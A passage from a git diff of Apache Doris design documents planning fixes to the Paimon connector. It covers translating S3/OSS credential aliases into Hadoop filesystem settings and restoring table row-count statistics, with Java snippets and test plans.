in current code) + +`PaimonCatalogFactory.applyStorageConfig` is the single storage-translation seam, shared by `buildHadoopConfiguration` (filesystem/jdbc), `buildHmsHiveConf` (hms), and `buildDlfHiveConf` (dlf). It only recognizes a 4-prefix allow-list plus raw Hadoop keys: + +- `fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java:74-75` — `USER_STORAGE_PREFIXES = {"paimon.s3.", "paimon.s3a.", "paimon.fs.s3.", "paimon.fs.oss."}`. +- `PaimonCatalogFactory.java:328-340` — `applyStorageConfig`: for each prop, if it starts with one of the 4 `paimon.*` prefixes it is re-keyed to `fs.s3a.` + remainder; else if it starts with `fs./dfs./hadoop.` it is copied verbatim; **everything else (including `s3.access_key`, `oss.access_key`, `s3.endpoint`, `oss.endpoint`, `oss.region`, `AWS_*`) is dropped.** + +The connector only ported the legacy **secondary** overlay (`AbstractPaimonProperties.normalizeS3Config` / `appendUserHadoopConfig`, fe-core `AbstractPaimonProperties.java:143-154`), which also only handles those same 4 `paimon.*` prefixes. It never ported the **primary** translation. In legacy the primary translation came from `StorageProperties.getHadoopStorageConfig()`, applied separately: + +- **filesystem/hms**: `PaimonHMSMetaStoreProperties.buildHiveConfiguration` (fe-core `PaimonHMSMetaStoreProperties.java:80-84`) iterates `storagePropertiesList` and `conf.addResource(sp.getHadoopStorageConfig())` BEFORE the `appendUserHadoopConfig` overlay. The filesystem/jdbc path feeds the same `getOrderedStoragePropertiesList()` into `CatalogContext` (`PaimonExternalCatalog.createCatalog:147` → `initializeCatalog`). +- **dlf**: `PaimonAliyunDLFMetaStoreProperties.initializeCatalog` (fe-core `PaimonAliyunDLFMetaStoreProperties.java:90-95`) selects the OSS/OSS_HDFS `StorageProperties` and `ossProps.getHadoopStorageConfig().forEach(hiveConf::set)`. + +For S3, `getHadoopStorageConfig` is `AbstractS3CompatibleProperties.appendS3HdfsProperties` (fe-core `AbstractS3CompatibleProperties.java:272-295`): from the canonical `s3.*`/`AWS_*` aliases it sets `fs.s3.impl`, `fs.s3a.impl`, `fs.s3a.endpoint`, `fs.s3a.endpoint.region`, `fs.s3.impl.disable.cache`, `fs.s3a.impl.disable.cache`, `fs.s3a.aws.credentials.provider`, `fs.s3a.access.key`, `fs.s3a.secret.key`, optional `fs.s3a.session.token`, and connection/path-style keys. + +For OSS, it is `OSSProperties.initializeHadoopStorageConfig` (fe-core `OSSProperties.java:315-326`): the S3A block above PLUS `fs.oss.impl` (Jindo), `fs.AbstractFileSystem.oss.impl`, `fs.oss.accessKeyId`, `fs.oss.accessKeySecret`, optional `fs.oss.securityToken`, `fs.oss.endpoint`, `fs.oss.region`. The canonical OSS aliases are declared on `OSSProperties` fields (fe-core `OSSProperties.java:48-91`): endpoint = `{oss.endpoint, s3.endpoint, AWS_ENDPOINT, endpoint, dlf.endpoint, dlf.catalog.endpoint, fs.oss.endpoint}`, accessKey = `{oss.access_key, s3.access_key, ..., dlf.access_key, fs.oss.accessKeyId}`, etc. + +So the connector's allow-list mismatches the keys Doris users actually pass (and the keys its own regression suite passes), and the credentials never reach the Paimon FileIO `Configuration`/`HiveConf`. Confirmed PaimonCatalogFactory imports zero `org.apache.doris.*` and currently sets none of the `fs.s3.impl`/`fs.s3a.impl`/credentials-provider keys. + +# Design + +Add a **canonical-key translation step** to `applyStorageConfig`, ported from legacy `appendS3HdfsProperties` + `OSSProperties.initializeHadoopStorageConfig`, keeping it fe-core-free (pure Map→setter, no `StorageProperties` import). The existing two branches (paimon.* re-key, raw fs./dfs./hadoop. passthrough) are **preserved unchanged** for backward compatibility — we only ADD recognition of the canonical aliases the connector currently drops. + +Principles, matching existing style: + +1. **Alias resolution via `firstNonBlank`** over the same alias lists legacy `@ConnectorProperty(names=...)` declared (literal string keys, mirroring how `DLF_*`/`HMS_URI` aliases are already declared as literal arrays in `PaimonConnectorProperties`). No fe-core types. +2. **S3A block** (both flavors): when an access key is resolvable, set `fs.s3a.access.key`/`fs.s3a.secret.key`/`fs.s3a.aws.credentials.provider=...SimpleAWSCredentialsProvider`, optional `fs.s3a.session.token`; always set `fs.s3.impl`/`fs.s3a.impl` + `disable.cache`; set `fs.s3a.endpoint` and `fs.s3a.endpoint.region` when present. This is the verbatim legacy `appendS3HdfsProperties` minus the FE-config-derived connection/timeout defaults (those are not credentials; the existing code already omits them, and Hadoop S3A has its own defaults — keep that minimal-change boundary). +3. **OSS block** (additive): when an OSS access key / endpoint / region is resolvable from canonical `oss.*` aliases, set the Jindo `fs.oss.*` keys (`fs.oss.impl`, `fs.AbstractFileSystem.oss.impl`, `fs.oss.accessKeyId`, `fs.oss.accessKeySecret`, optional `fs.oss.securityToken`, `fs.oss.endpoint`, `fs.oss.region`). Because the canonical OSS endpoint/key aliases overlap with `s3.*` (legacy `OSSProperties` shares them), the S3A block also gets populated from the same values — which is exactly legacy behavior (`OSSProperties.initializeHadoopStorageConfig` calls `super` = the S3A block first). This is desirable: it preserves the legacy "even for OSS we append S3 props for `s3://`-scheme back-compat" comment (fe-core `AbstractS3CompatibleProperties.java:266-269`). +4. **Precedence**: the existing `paimon.*` re-key and raw `fs./dfs./hadoop.` passthrough run AFTER the canonical translation, so an explicitly-passed `fs.s3a.access.key` or `paimon.s3.access-key` still wins (last-write). This matches legacy ordering: `addResource(getHadoopStorageConfig())` (canonical) THEN `appendUserHadoopConfig`/raw (paimon.*) overlay. +5. **Endpoint-from-region derivation is NOT ported** for the filesystem S3 case (legacy `setEndpointIfPossible` lives in `AbstractS3CompatibleProperties` and constructs from URL/region). The regression and documented config always pass an explicit endpoint; deriving it would require porting the S3/OSS endpoint-pattern machinery (large, fe-core-coupled). We set `fs.s3a.endpoint`/`fs.oss.endpoint` only when the user supplied one. For the **DLF** flavor, `buildDlfHiveConf` already derives the DLF *metastore* endpoint from region (`PaimonCatalogFactory.java:466-470`); the OSS *storage* endpoint for DLF should likewise be derivable — see Implementation Plan note (mirror `OSSProperties.getOssEndpoint` only inside the OSS block to keep DLF parity, since DLF users typically pass `dlf.region`/`oss.region` not `oss.endpoint`). + +Helper method `firstNonBlank` already exists and is exactly the alias-priority primitive needed. + +# Implementation Plan + +All changes in `PaimonCatalogFactory.java` (one file; tests in a second). No SPI/fe-core change. + +### 1. Add canonical alias constants (top of class, near `USER_STORAGE_PREFIXES`) + +```java +// Canonical Doris storage aliases (ported from fe-core S3Properties / OSSProperties +// @ConnectorProperty names). Listed in legacy priority order. Kept as literal strings +// to avoid importing fe-core StorageProperties. +private static final String[] S3_ACCESS_KEY_ALIASES = { + "s3.access_key", "AWS_ACCESS_KEY", "access_key", "ACCESS_KEY", "s3.access-key-id"}; +private static final String[] S3_SECRET_KEY_ALIASES = { + "s3.secret_key", "AWS_SECRET_KEY", "secret_key", "SECRET_KEY", "s3.secret-access-key"}; +private static final String[] S3_SESSION_TOKEN_ALIASES = { + "s3.session_token", "session_token", "s3.session-token", "AWS_TOKEN"}; +private static final String[] S3_ENDPOINT_ALIASES = { + "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT"}; +private static final String[] S3_REGION_ALIASES = { + "s3.region", "AWS_REGION", "region", "REGION"}; + +private static final String[] OSS_ACCESS_KEY_ALIASES = { + "oss.access_key", "fs.oss.accessKeyId", "dlf.access_key"}; +private static final String[] OSS_SECRET_KEY_ALIASES = { + "oss.secret_key", "fs.oss.accessKeySecret", "dlf.secret_key"}; +private static final String[] OSS_SESSION_TOKEN_ALIASES = { + "oss.session_token", "fs.oss.securityToken"}; +private static final String[] OSS_ENDPOINT_ALIASES = { + "oss.endpoint", "fs.oss.endpoint"}; +private static final String[] OSS_REGION_ALIASES = {"oss.region", "dlf.region"}; + +private static final String S3A_IMPL = "org.apache.hadoop.fs.s3a.S3AFileSystem"; +private static final String S3A_SIMPLE_CRED_PROVIDER = + "org.apache.hadoop.fs.s3a.SimpleAWSCredentialsProvider"; +// JindoOSS impls (literals; avoid the Aliyun compile dep, same pattern as appendDlfOptions). +private static final String JINDO_OSS_IMPL = "com.aliyun.jindodata.oss.JindoOssFileSystem"; +private static final String JINDO_OSS_ABSTRACT_IMPL = "com.aliyun.jindodata.oss.JindoOSS"; +``` + +Note: I deliberately list `s3.endpoint`/`s3.access_key` in the OSS aliases' *source* indirectly — legacy `OSSProperties` accepts `s3.*` as OSS aliases too. To keep this minimal and avoid double-population surprises, OSS detection keys off OSS-specific aliases (`oss.*`/`fs.oss.*`/`dlf.*`); when only `s3.*` keys are present the S3A block already covers them (legacy populates S3A regardless). This preserves the documented "append S3 props even for OSS" back-compat. + +### 2. Rewrite `applyStorageConfig` to run canonical translation first, then existing logic + +```java +private static void applyStorageConfig(Map props, BiConsumer setter) { + applyCanonicalS3Config(props, setter); // NEW: ported appendS3HdfsProperties + applyCanonicalOssConfig(props, setter); // NEW: ported OSSProperties.initializeHadoopStorageConfig OSS block + // Existing behavior preserved (overlays canonical, last-write-wins = legacy ordering): + props.forEach((key, value) -> { + for (String prefix : USER_STORAGE_PREFIXES) { + if (key.startsWith(prefix)) { + setter.accept(FS_S3A_PREFIX + key.substring(prefix.length()), value); + return; + } + } + if (key.startsWith("fs.") || key.startsWith("dfs.") || key.startsWith("hadoop.")) { + setter.accept(key, value); + } + }); +} +``` + +`applyCanonicalS3Config` (ported from `appendS3HdfsProperties`, credentials-relevant subset): + +```java +private static void applyCanonicalS3Config(Map props, BiConsumer setter) { + String ak = firstNonBlank(props, S3_ACCESS_KEY_ALIASES); + String sk = firstNonBlank(props, S3_SECRET_KEY_ALIASES); + String endpoint = firstNonBlank(props, S3_ENDPOINT_ALIASES); + String region = firstNonBlank(props, S3_REGION_ALIASES); + String token = firstNonBlank(props, S3_SESSION_TOKEN_ALIASES); + // Only emit S3A config when the user actually configured an S3-style storage key. + if (ak == null && endpoint == null && region == null) { + return; + } + setter.accept("fs.s3.impl", S3A_IMPL); + setter.accept("fs.s3a.impl", S3A_IMPL); + setter.accept("fs.s3.impl.disable.cache", "true"); + setter.accept("fs.s3a.impl.disable.cache", "true"); + if (StringUtils.isNotBlank(endpoint)) { + setter.accept("fs.s3a.endpoint", endpoint); + } + if (StringUtils.isNotBlank(region)) { + setter.accept("fs.s3a.endpoint.region", region); + } + if (StringUtils.isNotBlank(ak)) { + setter.accept("fs.s3a.aws.credentials.provider", S3A_SIMPLE_CRED_PROVIDER); + setter.accept("fs.s3a.access.key", ak); + setter.accept("fs.s3a.secret.key", nullToEmpty(sk)); + if (StringUtils.isNotBlank(token)) { + setter.accept("fs.s3a.session.token", token); + } + } +} +``` + +`applyCanonicalOssConfig` (ported from `OSSProperties.initializeHadoopStorageConfig` OSS block; only the OSS-specific aliases trigger it): + +```java +private static void applyCanonicalOssConfig(Map props, BiConsumer setter) { + String ak = firstNonBlank(props, OSS_ACCESS_KEY_ALIASES); + String sk = firstNonBlank(props, OSS_SECRET_KEY_ALIASES); + String endpoint = firstNonBlank(props, OSS_ENDPOINT_ALIASES); + String region = firstNonBlank(props, OSS_REGION_ALIASES); + String token = firstNonBlank(props, OSS_SESSION_TOKEN_ALIASES); + if (ak == null && endpoint == null && region == null) { + return; + } + setter.accept("fs.oss.impl", JINDO_OSS_IMPL); + setter.accept("fs.AbstractFileSystem.oss.impl", JINDO_OSS_ABSTRACT_IMPL); + if (StringUtils.isNotBlank(ak)) { + setter.accept("fs.oss.accessKeyId", ak); + setter.accept("fs.oss.accessKeySecret", nullToEmpty(sk)); + } + if (StringUtils.isNotBlank(token)) { + setter.accept("fs.oss.securityToken", token); + } + if (StringUtils.isNotBlank(endpoint)) { + setter.accept("fs.oss.endpoint", endpoint); + } + if (StringUtils.isNotBlank(region)) { + setter.accept("fs.oss.region", region); + } +} +``` + +### 3. (Optional, DLF parity) OSS endpoint-from-region for DLF + +Legacy DLF derives the OSS endpoint from region (`OSSProperties.getOssEndpoint(region, accessPublic)`). `buildDlfHiveConf` already computes `accessPublic` and derives the DLF metastore endpoint. To match DLF parity when a user passes only `dlf.region`/`oss.region` (no `oss.endpoint`), derive `fs.oss.endpoint = "oss-" + region + (accessPublic ? "" : "-internal") + ".aliyuncs.com"` inside `buildDlfHiveConf` after `applyStorageConfig`, only when `fs.oss.endpoint` is still unset. Keep this DLF-local (do not put region-derivation in the shared `applyCanonicalOssConfig`, since the filesystem S3/OSS flavor legacy required an explicit endpoint there). This is a small, additive overlay in `buildDlfHiveConf` and can be scoped out if we want the absolute minimal credential-only fix; flag it explicitly in the PR so the reviewer decides. Recommended to include for DLF Finding 9.2 completeness. + +### Update Javadoc + +Amend the `applyStorageConfig` and `buildHadoopConfiguration` Javadocs to state that canonical `s3.*`/`oss.*`/`AWS_*` aliases are now translated to `fs.s3a.*`/`fs.oss.*` (ported from legacy `appendS3HdfsProperties` + `OSSProperties.initializeHadoopStorageConfig`), in addition to the `paimon.*` re-key and raw passthrough. + +# Risk Analysis + +**Parity vs legacy** +- S3A block: ports the credential-bearing subset of `appendS3HdfsProperties` verbatim (impl/disable-cache/endpoint/region/credentials-provider/access/secret/token). Intentionally omits the connection/timeout/path-style keys (`fs.s3a.connection.maximum`, `...request.timeout`, `...path.style.access`) — those are not credentials and Hadoop S3A supplies its own defaults; the pre-fix code already set none of them, so omitting them is the minimal-change boundary, not a regression. If a deployment relied on `use_path_style`, that is a separate, pre-existing gap (call out in PR, defer). +- Endpoint-from-region/URL derivation (`setEndpointIfPossible`) is NOT ported for filesystem; documented config always supplies an explicit endpoint, and porting the endpoint-pattern engine would pull in fe-core-coupled regex machinery. DLF region-derivation handled locally (item 3). +- OSS block ports `OSSProperties.initializeHadoopStorageConfig` (Jindo impls + `fs.oss.*` credentials/endpoint/region). The Aliyun Jindo class names are hard-coded literals, matching the existing `appendDlfOptions` pattern that already hard-codes `com.aliyun.datalake...ProxyMetaStoreClient` to avoid the compile dep. + +**Shared-code blast radius** +- `applyStorageConfig` is called by `buildHadoopConfiguration` (filesystem, jdbc), `buildHmsHiveConf` (hms), `buildDlfHiveConf` (dlf). Adding canonical translation there fixes filesystem S3/OSS (Finding 9.1) and DLF OSS (Finding 9.2) in one place, and also improves hms/jdbc when canonical keys are used — all strictly additive (previously dropped keys now translated). +- **Back-compat**: the existing `paimon.*` re-key and raw `fs./dfs./hadoop.` branches are unchanged and run AFTER the canonical translation, so any user already passing `paimon.s3.access-key` or a raw `fs.s3a.access.key` gets identical output (their explicit key overwrites, last-write-wins — matching legacy `addResource(...)` then `appendUserHadoopConfig` ordering). No existing test should change behavior. + +**Edge cases** +- Anonymous / no-credential public buckets: when `ak` is null we still set `fs.s3.impl`/`fs.s3a.impl`/`disable.cache` and endpoint/region but no credentials provider — matches legacy (`appendS3HdfsProperties` only sets the provider/keys inside the `isNotBlank(accessKey)` guard). +- Mixed `s3.*` + `oss.*` keys: S3A block populated from s3 aliases, OSS block from oss aliases; both emitted, no collision (different key namespaces). Legacy does the same (OSS appends S3A then OSS keys). +- DLF gate interaction: `requireOssStorageForDlf` still runs first in `PaimonConnector.createCatalog`; with canonical `oss.*` now translated, the gate-passes-but-no-creds mismatch is closed. +- `s3.endpoint` is also a legacy OSS alias. Because OSS detection keys off `oss.*`/`fs.oss.*`/`dlf.*` only, a pure-`s3.*` config does NOT trigger the OSS Jindo block (correct — it is an S3 catalog); a pure-`oss.*` config triggers both blocks (correct — legacy OSS appends S3A too). + +# Test Plan + +## Unit Tests +New tests in `PaimonCatalogFactoryTest.java` (matching the existing offline, plain-map, no-Mockito style and the existing `buildHadoopConfigurationNormalizesS3PrefixesAndCopiesRawKeys` / `buildDlfHiveConf*` tests). Each FAILS before the fix (key absent / value null) and PASSES after, and each comment encodes WHY (credential reaches FileIO), not just WHAT — designed to catch a regression that re-drops the canonical keys. + +1. `buildHadoopConfigurationTranslatesCanonicalS3Credentials` — the exact regression scenario. Input `props("s3.access_key","ak","s3.secret_key","sk","s3.endpoint","s3.ap-east-1.amazonaws.com")`. Assert `fs.s3a.access.key=ak`, `fs.s3a.secret.key=sk`, `fs.s3a.endpoint=s3.ap-east-1.amazonaws.com`, `fs.s3a.aws.credentials.provider` = SimpleAWSCredentialsProvider, `fs.s3a.impl` set, `fs.s3.impl.disable.cache=true`. INTENT comment: without these the Paimon FileSystem catalog reaches S3 anonymously and the documented `test_paimon_s3.groovy` config gets access-denied. MUTATION: dropping `s3.access_key` (current behavior) leaves `fs.s3a.access.key` null → test red. + +2. `buildHadoopConfigurationTranslatesAwsEnvAliases` — input `AWS_ACCESS_KEY`/`AWS_SECRET_KEY`/`AWS_ENDPOINT`/`AWS_REGION`/`AWS_TOKEN`. Assert the same `fs.s3a.*` keys incl. `fs.s3a.session.token` and `fs.s3a.endpoint.region`. INTENT: legacy accepted the AWS_* alias family; verifies alias priority list, not just the primary key. + +3. `buildHadoopConfigurationDoesNotEmitCredsProviderForAnonymousBucket` — input only `s3.endpoint`/`s3.region` (no keys). Assert `fs.s3a.endpoint`/`fs.s3a.endpoint.region` set, `fs.s3.impl` set, but `fs.s3a.access.key` and `fs.s3a.aws.credentials.provider` absent. INTENT: anonymous public-dataset parity (legacy guards the provider behind isNotBlank(accessKey)). + +4. `buildHadoopConfigurationExplicitFsS3aKeyOverridesCanonical` — input both `s3.access_key=canon` and `fs.s3a.access.key=explicit`. Assert `fs.s3a.access.key=explicit`. INTENT: locks the legacy last-write ordering (raw passthrough overlays canonical); guards against a future refactor that reverses precedence and breaks power users. + +5. `buildDlfHiveConfTranslatesCanonicalOssCredentials` — input `dlf.access_key`/`dlf.secret_key`/`dlf.endpoint`/`dlf.region` + `oss.access_key`/`oss.secret_key`/`oss.endpoint`/`oss.region`. Assert the 8 `dlf.catalog.*` keys still present AND `fs.oss.accessKeyId`/`fs.oss.accessKeySecret`/`fs.oss.endpoint`/`fs.oss.region`/`fs.oss.impl`(Jindo) set. INTENT: closes Finding 9.2 — gate-passes-but-no-OSS-creds; the assertion that `fs.oss.accessKeyId` is non-null is exactly what fails today. + +6. `requireOssStorageForDlfThenBuildDlfHiveConfYieldsOssCreds` — integration of the gate + builder with canonical `oss.*` only (no `paimon.fs.oss.*`). First `assertDoesNotThrow(requireOssStorageForDlf(props))`, then assert `buildDlfHiveConf(props).get("fs.oss.accessKeyId")` non-null. INTENT: encodes the BLOCKER end-to-end — the gate and the translation must agree on the same key set. + +7. (If item 3 of plan included) `buildDlfHiveConfDerivesOssEndpointFromRegion` — input `oss.region=cn-hangzhou`, no `oss.endpoint`, default access. Assert `fs.oss.endpoint=oss-cn-hangzhou-internal.aliyuncs.com`; with `dlf.access.public=true` assert public variant. INTENT: DLF parity with `OSSProperties.getOssEndpoint`. + +Keep one explicit negative test untouched/extended: existing `buildHadoopConfigurationNormalizesS3PrefixesAndCopiesRawKeys` must still pass (confirms `paimon.s3.*` back-compat unchanged). + +## E2E Tests +- `regression-test/suites/external_table_p0/paimon/test_paimon_s3.groovy` is the natural live verifier (already uses `s3.access_key/s3.secret_key/s3.endpoint` + `paimon.catalog.type=filesystem`). It is **live-only / CI-gated**: runs only when `enablePaimonTest=true` and real `AWSAK`/`AWSSK` credentials + a private S3 bucket are configured (`test_paimon_s3.groovy:60-61`). Cannot run in this offline environment (no creds, no bucket); it is the cutover live-e2e gate, consistent with the connector's own `buildHmsHiveConf`/`buildDlfHiveConf` notes that the live metastore=hive path "MUST be verified by live-e2e before cutover". No new e2e file needed; the offline UTs above are the deterministic regression guard. For DLF (Finding 9.2) a DLF live suite would be needed but requires Aliyun DLF + OSS credentials and the host hive-catalog-shade — defer to live cutover, same gating rationale. + +--- + +# ✅ IMPL SUMMARY (2026-06-11) + +**Status: DONE — build+UT green (PaimonCatalogFactoryTest 38 tests, 0 fail/err/skip; HEAD uncommitted).** + +## Fix +One file changed for production (`PaimonCatalogFactory.java`), one for tests (`PaimonCatalogFactoryTest.java`). fe-core-free; `bash tools/check-connector-imports.sh` clean. + +- Added canonical alias constant arrays (`S3_*_ALIASES`, `OSS_*_ALIASES`) + impl/provider literals (`S3A_IMPL`, `S3A_SIMPLE_CRED_PROVIDER`, `JINDO_OSS_IMPL`, `JINDO_OSS_ABSTRACT_IMPL`). +- `applyStorageConfig` now runs `applyCanonicalS3Config` + `applyCanonicalOssConfig` FIRST, then the pre-existing `paimon.*` re-key + raw `fs./dfs./hadoop.` passthrough (last-write-wins = legacy precedence). The two pre-existing branches are byte-unchanged. +- `applyCanonicalS3Config`: canonical `s3.*`/`AWS_*` → `fs.s3a.*` (impl/disable-cache always; endpoint/region when present; provider+access/secret/token only when an access key is present — anonymous parity). +- `applyCanonicalOssConfig`: canonical `oss.*`/`fs.oss.*`/`dlf.*` → Jindo `fs.oss.*`. Detection keys off OSS-specific aliases only, so a pure-`s3.*` config does not trigger the Jindo block. +- **Optional item 3 INCLUDED** (DLF parity, Finding 9.2 completeness): `buildDlfHiveConf` derives `fs.oss.endpoint` from `oss.region`/`dlf.region` when no explicit `oss.endpoint` was given (`oss-[-internal].aliyuncs.com`, default non-public = `-internal`). Kept DLF-local. + +## Tests (7 new, all fail-before / pass-after) +`buildHadoopConfigurationTranslatesCanonicalS3Credentials`, `…TranslatesAwsEnvAliases`, `…DoesNotEmitCredsProviderForAnonymousBucket`, `…ExplicitFsS3aKeyOverridesCanonical`, `buildDlfHiveConfTranslatesCanonicalOssCredentials`, `requireOssStorageForDlfThenBuildDlfHiveConfYieldsOssCreds`, `buildDlfHiveConfDerivesOssEndpointFromRegion`. + +## Correction discovered during impl +The design's planned `assertNull(conf.get("fs.s3a.aws.credentials.provider"))` for the anonymous-bucket test is WRONG: Hadoop `Configuration` resolves a baked-in DEFAULT provider chain (`Temporary,Simple,Env,IAM`) from the hadoop-aws jar, so the key is never null. Production code is correct (it does not override the provider when the access key is blank). The assertion was changed to `assertNotEquals(SimpleAWSCredentialsProvider-single, …)` — which still catches the real mutation (dropping the `isNotBlank(ak)` guard → forcing Simple-only → breaks env/IAM fallback). access.key (no Hadoop default) is still asserted null. + +## Live-e2e (gated, NOT run here) +`regression-test/.../paimon/test_paimon_s3.groovy` (filesystem+S3) and a DLF/OSS live suite — both need real creds + buckets; deferred to cutover live-e2e. diff --git a/plan-doc/tasks/designs/P5-fix-FIX-TABLE-STATS-design.md b/plan-doc/tasks/designs/P5-fix-FIX-TABLE-STATS-design.md new file mode 100644 index 00000000000000..1b0f9c805274ed --- /dev/null +++ b/plan-doc/tasks/designs/P5-fix-FIX-TABLE-STATS-design.md @@ -0,0 +1,169 @@ +# Problem + +The paimon connector never overrides `getTableStatistics` from the `ConnectorMetadata` SPI. The FE table object `PluginDrivenExternalTable.fetchRowCount()` resolves the connector table handle and then calls `metadata.getTableStatistics(session, handle)`; when that returns `Optional.empty()` (or a row count < 0) it falls back to `UNKNOWN_ROW_COUNT` (-1). Because `PaimonConnectorMetadata` inherits the default `ConnectorStatisticsOps.getTableStatistics` (which returns `Optional.empty()`), every paimon plugin table — normal AND system tables (`PluginDrivenSysExternalTable extends PluginDrivenExternalTable`, inherits the same `fetchRowCount`) — reports a base-table row count of -1 (UNKNOWN). + +Legacy `PaimonExternalTable.fetchRowCount()` and `PaimonSysExternalTable.fetchRowCount()` returned the REAL row count (sum of planned-split record counts). The regression is silent: cost model / cardinality degrades (Nereids join-order, broadcast decisions; per the review, `StatsCalculator.disableJoinReorderIfStatsInvalid` forces `DISABLE_JOIN_REORDER=true` for the whole query when rowCount==-1), and `SHOW TABLE STATUS` / `information_schema.tables` reports -1. No wrong rows, no crash — just degraded plans and missing stats. Confirmed MAJOR (review §8, Finding 5.1). + +# Root Cause (confirmed in current code, cite file:line I actually read) + +- `PaimonConnectorMetadata` (read in full, `fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java`) implements `ConnectorMetadata` but has NO `getTableStatistics` method anywhere in the class. It therefore inherits the default. +- `ConnectorStatisticsOps.java:30-34` — the default `getTableStatistics(...)` returns `Optional.empty()`. +- `PluginDrivenExternalTable.java:436-453` — `fetchRowCount()` does `metadata.getTableStatistics(session, handleOpt.get())`; on empty / rowCount<0 returns `UNKNOWN_ROW_COUNT` (the `return UNKNOWN_ROW_COUNT` at :445 and :452). +- `PluginDrivenSysExternalTable.java:41` — `extends PluginDrivenExternalTable`, inheriting that same `fetchRowCount` (so sys tables get -1 too; review Finding 5.1). +- Legacy reference — `PaimonExternalTable.java:209-221` computes `rowCount += split.rowCount()` over `getBasePaimonTable().newReadBuilder().newScan().plan().splits()`, returns `rowCount > 0 ? rowCount : UNKNOWN_ROW_COUNT` (i.e. 0 → -1). `PaimonSysExternalTable.java:200-211` is byte-identical against `getSysPaimonTable()`. +- The connector ALREADY drives that exact paimon idiom in `PaimonScanPlanProvider.java:178-186` (`table.newReadBuilder().newScan().plan().splits()`) and reads `split.rowCount()` (`PaimonScanPlanProvider.java:327`), so the SDK call shape is proven inside the module. +- `ConnectorTableStatistics.java:35-48` — ctor is `(rowCount, dataSize)`; `UNKNOWN = (-1,-1)`. The JDBC reference `JdbcConnectorMetadata.java:142-153` shows the established override shape: compute row count, return `Optional.of(new ConnectorTableStatistics(rowCount, -1))` when `rowCount >= 0`, else `Optional.empty()`. + +# Design + +Override `getTableStatistics` in `PaimonConnectorMetadata`, computing the row count by summing `Split.rowCount()` over the planned splits of the resolved live `Table` — exactly the legacy computation, ported into the connector. + +Two constraints drive the shape: + +1. **No fe-core import** — respected: the fix lives entirely in the connector module and uses only paimon SDK types (`Table`, `Split`) plus the SPI `ConnectorTableStatistics` / `Optional`. No new fe-core dependency. + +2. **Offline unit-testability via a seam** — this is the load-bearing design decision and the reason I do NOT inline `table.newReadBuilder().newScan().plan().splits()` directly in the metadata method. The whole MVCC/time-travel logic was deliberately structured so `PaimonConnectorMetadata` calls plain-`long`-returning `PaimonCatalogOps` seam methods (see the seam Javadoc at `PaimonCatalogOps.java:79-83`: "return plain `long`s ... so the metadata layer's logic ... is unit-testable offline with `RecordingPaimonCatalogOps`"). The test double `FakePaimonTable.newReadBuilder()` THROWS `UnsupportedOperationException` (`FakePaimonTable.java:237-239`), so a metadata method that called `newReadBuilder()` directly could never be exercised offline. To stay consistent with the module's established pattern AND keep the new logic testable, add a single `long rowCount(Table table)` method to the `PaimonCatalogOps` seam: + + - `CatalogBackedPaimonCatalogOps.rowCount(Table)` does the real paimon work (`newReadBuilder().newScan().plan().splits()` sum), mirroring legacy line-for-line. + - `PaimonConnectorMetadata.getTableStatistics` resolves the table via the existing `resolveTable(handle)` (the same sys-aware resolver every metadata read path uses), calls `catalogOps.rowCount(table)`, applies the legacy `>0 ? n : UNKNOWN` rule, and wraps in `ConnectorTableStatistics(rowCount, -1)` (dataSize left UNKNOWN, matching JDBC reference and the fact legacy never computed a base-table dataSize here). + +`resolveTable` is sys-aware (`PaimonConnectorMetadata.java:931-937` → `PaimonTableResolver.resolve`), so a sys handle resolves its OWN synthetic table and `rowCount` plans the sys table's splits — this single override gives BOTH normal and sys paimon tables their real count, closing Finding 5.1 with the same code (no separate sys path needed, mirroring how legacy had two parallel-but-identical `fetchRowCount` bodies). + +dataSize: returned as -1 (UNKNOWN). Legacy `fetchRowCount` produced only a row count; there is no legacy base-table dataSize to port, and JDBC's reference override also returns dataSize=-1. Keeping dataSize unknown is faithful and avoids inventing a number. + +Error handling: a planning failure (remote IO, etc.) should NOT crash stats collection (which runs in background analysis / SHOW paths). Return `Optional.empty()` (→ FE falls back to -1) on exception, logging a warning — consistent with the connector's other best-effort read paths (e.g. `listDatabaseNames` `PaimonConnectorMetadata.java:96-99`, `collectPartitions` swallowing `TableNotExistException` at :869-873). This preserves the legacy END STATE (-1) on failure without a louder regression than legacy (legacy would have propagated, but legacy ran inside `fetchRowCount` whose callers tolerate exceptions becoming -1; empty-on-failure is the safer, equivalent-visible-result choice and matches the SPI's empty-if-unavailable contract). + +# Implementation Plan + +**File 1 — `fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java`** + +Add one seam method to the interface (next to the E5 MVCC lookups block, with Javadoc matching the existing seam-rationale style): + +```java +/** + * Returns the total row count of {@code table} = sum of {@code split.rowCount()} over + * {@code table.newReadBuilder().newScan().plan().splits()} (legacy + * PaimonExternalTable.fetchRowCount / PaimonSysExternalTable.fetchRowCount). Returns a plain + * {@code long} (never a paimon Split list) so the metadata layer's >0-else-UNKNOWN logic is + * unit-testable offline with RecordingPaimonCatalogOps (FakePaimonTable.newReadBuilder() throws). + */ +long rowCount(Table table); +``` + +Implement in `CatalogBackedPaimonCatalogOps` (add `import org.apache.paimon.table.source.Split;`): + +```java +@Override +public long rowCount(Table table) { + long rowCount = 0; + for (Split split : table.newReadBuilder().newScan().plan().splits()) { + rowCount += split.rowCount(); + } + return rowCount; +} +``` + +**File 2 — `fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java`** + +Add imports: `org.apache.doris.connector.api.ConnectorTableStatistics`, `org.apache.paimon.table.Table` is already imported. Add the override (placed near the other read/stat methods, e.g. after `getColumnHandles`): + +```java +/** + * Returns the base-table row count = sum of planned-split row counts (legacy + * PaimonExternalTable.fetchRowCount, lines 209-221: rowCount>0 ? rowCount : UNKNOWN). Shared by + * normal AND system paimon tables: fe-core PluginDrivenSysExternalTable inherits + * PluginDrivenExternalTable.fetchRowCount, and resolveTable is sys-aware, so a sys handle plans + * its OWN synthetic table's splits. Returns Optional.empty() (-> fe-core -1) when the count is 0 + * (legacy parity) or planning fails (best-effort, like the other connector read paths). dataSize + * is left UNKNOWN (-1): legacy computed no base-table dataSize here. + */ +@Override +public Optional getTableStatistics( + ConnectorSession session, ConnectorTableHandle handle) { + PaimonTableHandle paimonHandle = (PaimonTableHandle) handle; + long rowCount; + try { + rowCount = 